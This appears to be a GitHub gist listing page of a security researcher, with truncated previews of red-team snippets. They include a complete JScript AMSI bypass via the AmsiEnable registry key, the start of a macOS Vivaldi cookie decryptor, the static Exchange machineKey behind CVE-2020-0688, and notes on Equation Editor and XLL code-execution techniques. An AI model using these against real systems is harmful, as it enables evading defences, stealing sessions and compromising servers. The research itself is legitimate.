Skip to content

Instantly share code, notes, and snippets.

rxwx /
Created August 13, 2019 09:04
Pulse Secure Version Scanner
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
print " Usage: python <target ip/domain>"
rxwx /
Last active June 8, 2022 11:06
Attachment permissions in each version of Adobe Reader 11.0.10 - 11.0.x
rxwx /
Created April 15, 2020 10:23
Get Office version that last saved the file
import re
import sys
versions = {
0x00: 'Excel 97',
0x01: 'Excel 2000',
0x02: 'Excel 2002',
0x03: 'Office Excel 2003',
0x04: 'Office Excel 2007',
0x06: 'Excel 2010',
rxwx / bypass.js
Created August 16, 2018 17:14
AMSIEnable Bypass in JScript
View bypass.js
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
var AmsiEnable = sh.RegRead(key);
throw new Error(1, '');
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
rxwx /
Last active May 14, 2020 13:03
Decrypt Vivaldi Cookies on MacOS
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file
rxwx / CVE-2020-0688.config
Created February 14, 2020 16:38
View CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
rxwx /
Last active February 21, 2020 06:19
Notes on new Equation Editor Exploit, CVE-2018-0802 variant

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

rxwx / ziptool.ps1
Created May 4, 2018 17:47
File Zip in native PowerShell with .NET 3.0
View ziptool.ps1
Author: Rich Warren
Based on original c# code by Jon Galloway:
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
rxwx / get-linkedin-id.js
Created August 25, 2017 15:43
JS to grab a linkedin memberID from a profile
View get-linkedin-id.js
// paste this in the chrome console and call findMemberID() when on a profile page
// need to be logged in
function decodeHtml(html) {
var txt = document.createElement("textarea");
txt.innerHTML = html;
return txt.value;
function httpGet(){
rxwx /
Last active January 19, 2018 21:55


An XLL file is basically a DLL with some special features to make it work with Excel.

See -

By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.

The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.